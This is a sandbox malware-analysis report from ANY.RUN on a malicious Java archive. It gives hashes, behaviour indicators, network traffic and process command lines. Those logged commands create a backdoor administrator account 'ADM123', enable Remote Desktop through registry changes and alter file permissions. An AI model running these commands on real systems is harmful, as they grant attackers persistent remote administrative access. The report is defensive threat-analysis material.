File name:

250427-vcfkasxnv8.bin.jar

Full analysis: https://app.any.run/tasks/7da295a2-4352-4e89-a062-d444fa879048
Verdict: Malicious activity
Analysis date: April 27, 2025, 18:09:44
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
java
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5:

D94217BFD30C8FD185D714E945F3D4E3

SHA1:

D70734A07E4C07E04B479CD4525FDA33442307F1

SHA256:

8B914ECB7D69A537FE069B62FE8762490B25DCD1E606FCEB9604B8D4488E2DB9

SSDEEP:

49152:iD3EHrtL0NIeI2LSc9m6jqBF3znr4gmBfLFOBWw451MmfnuRvOFNUetcUVa67/Ro:iD3IrtnkSc9/83gLBZOYB51MZCiqRVRa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts NET.EXE for service management

      • cmd.exe (PID: 7760)
      • net.exe (PID: 8156)
      • net.exe (PID: 8108)
      • net.exe (PID: 6676)
      • net.exe (PID: 7580)

    • Starts NET.EXE to view/add/change user profiles

      • cmd.exe (PID: 7760)
      • net.exe (PID: 7172)
      • net.exe (PID: 2140)

    • Starts NET.EXE to view/change users localgroup

      • net.exe (PID: 4980)
      • cmd.exe (PID: 7760)
      • net.exe (PID: 7012)
      • net.exe (PID: 668)
      • net.exe (PID: 7540)
      • net.exe (PID: 7644)
      • net.exe (PID: 6132)
      • net.exe (PID: 7632)
      • net.exe (PID: 896)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • javaw.exe (PID: 7408)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7556)
      • cmd.exe (PID: 7564)

    • Executing commands from a ".bat" file

      • javaw.exe (PID: 7408)

    • Reads security settings of Internet Explorer

      • javaw.exe (PID: 7408)

    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 7760)

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 7760)

    • Executable content was dropped or overwritten

      • javaw.exe (PID: 7408)

    • Reads the date of Windows installation

      • javaw.exe (PID: 7408)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 7760)

    • Sets the service to start on system boot

      • sc.exe (PID: 6652)
      • sc.exe (PID: 7696)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 7760)

    • Uses SYSTEMINFO.EXE to read the environment

      • javaw.exe (PID: 7408)

    • There is functionality for taking screenshot (YARA)

      • javaw.exe (PID: 7408)

  • INFO

    • Application based on Java

      • javaw.exe (PID: 7408)

    • Creates files in the program directory

      • javaw.exe (PID: 7408)

    • Reads the computer name

      • javaw.exe (PID: 7408)

    • Create files in a temporary directory

      • javaw.exe (PID: 7408)

    • Process checks computer location settings

      • javaw.exe (PID: 7408)

    • Creates files or folders in the user directory

      • javaw.exe (PID: 7408)

    • Checks supported languages

      • javaw.exe (PID: 7408)

    • Reads the machine GUID from the registry

      • javaw.exe (PID: 7408)

    • Reads the software policy settings

      • slui.exe (PID: 5972)

    • Checks proxy server information

      • slui.exe (PID: 5972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0808
ZipCompression: Deflated
ZipModifyDate: 2013:04:29 15:42:58
ZipCRC: 0xe380a165
ZipCompressedSize: 597
ZipUncompressedSize: 1914
ZipFileName: META-INF/MANIFEST.MF
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
199
Monitored processes
77
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start javaw.exe icacls.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs attrib.exe no specs attrib.exe no specs cmd.exe no specs conhost.exe no specs takeown.exe no specs takeown.exe no specs icacls.exe no specs icacls.exe no specs icacls.exe no specs icacls.exe no specs takeown.exe no specs takeown.exe no specs icacls.exe no specs icacls.exe no specs icacls.exe no specs icacls.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs sc.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs sc.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs systeminfo.exe no specs conhost.exe no specs tiworker.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
668C:\WINDOWS\system32\net.exe localgroup administrators ADM123 /addC:\Windows\System32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
896net localgroup administradores ADM123 /addC:\Windows\System32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1072C:\WINDOWS\system32\reg.exe ADD "HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN" /v "Extensions Off Page" /t REG_SZ /d "http://br.msn.com" /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1660C:\WINDOWS\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "EnableConcurrentSessions" /t REG_DWORD /d 0x1 /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2088C:\WINDOWS\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "MaxInstanceCount" /t REG_DWORD /d 0x5 /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2140net user ADM123 123 /addC:\Windows\System32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2236C:\WINDOWS\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2340C:\WINDOWS\system32\net1 user ADM123 123 /addC:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\samcli.dll
c:\windows\system32\ucrtbase.dll
3100C:\WINDOWS\system32\reg.exe add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
3156C:\WINDOWS\system32\reg.exe ADD "HKLM\Software\Policies\Google\Chrome" /v AlwaysAuthorizePlugins /t REG_DWORD /d 1 /f C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
9 732
Read events
9 730
Write events
2
Delete events
0

Modification events

(PID) Process:(8024) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31176607
(PID) Process:(8024) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
Executable files
1
Suspicious files
1
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
7408javaw.exeC:\ProgramData\Oracle\Java\.oracle_jre_usage\17dfc292991c8061.timestamptext
MD5:30923D2198124063A7487342EADA48B2
SHA256:FAC366A33F79D24D1563F2523EAC6C1E2E2A8AEF96BDA2B4067BDB557C77274F
7408javaw.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\83aa4cc77f591dfc2374580bbd95f6ba_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:C8366AE350E7019AEFC9D1E6E6A498C6
SHA256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
8024TiWorker.exeC:\Windows\Logs\CBS\CBS.logtext
MD5:BCDABF2D9D3B3FD15471E8EF992BD536
SHA256:5DC79DE408D7EB2527B27F0DBEB8BA9E2ADAAFBDC73DDD7BDEBA34F17E0739A7
7408javaw.exeC:\Users\admin\AppData\Local\Temp\jna\jna4459699807285432333.dllexecutable
MD5:715C98AA5955E7E07FB99D87F522E73A
SHA256:B7F1133492A060A857A1EF0877E18E382F1C418E5DAC2E674ABC65F336241D61
7760cmd.exeC:\Users\admin\AppData\Local\Temp\temp.temptext
MD5:2F8F3230BBC42E379A1554CA3419D46D
SHA256:3EFE94E50D33A368DCA95D1B612243AEC88DDBD1353245769C79B82FC857AE09
7408javaw.exeC:\Users\admin\AppData\Local\Temp\Atualizacao.battext
MD5:0107BFE65B47B0EEDF2D28F26EBA72CB
SHA256:EA0AC94232C9A6A02E406ADAA456A6CE56439BDE9A23BE878BAD71A8EE11FC5F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
520
TCP/UDP connections
536
DNS requests
14
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
304
20.109.210.53:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
7408
javaw.exe
GET
200
142.250.181.227:80
http://www.google.com.br/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7408
javaw.exe
142.250.181.227:80
www.google.com.br
GOOGLE
US
whitelisted
4
System
192.168.100.255:137
whitelisted
8128
SIHClient.exe
20.12.23.50:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
8128
SIHClient.exe
184.24.77.35:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
8128
SIHClient.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
8128
SIHClient.exe
13.95.31.18:443
fe3cr.delivery.mp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 172.217.18.14
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
www.google.com.br
  • 142.250.181.227
whitelisted
dlls.proxysegura.com
unknown
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
crl.microsoft.com
  • 184.24.77.35
  • 184.24.77.42
  • 184.24.77.7
  • 184.24.77.38
  • 184.24.77.18
  • 184.24.77.37
  • 184.24.77.34
  • 184.24.77.30
  • 184.24.77.14
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

PID
Process
Class
Message
7408
javaw.exe
Potentially Bad Traffic
ET INFO Vulnerable Java Version 1.8.x Detected
7408
javaw.exe
Potentially Bad Traffic
ET INFO Vulnerable Java Version 1.8.x Detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
250427-vcfkasxnv8.bin.jar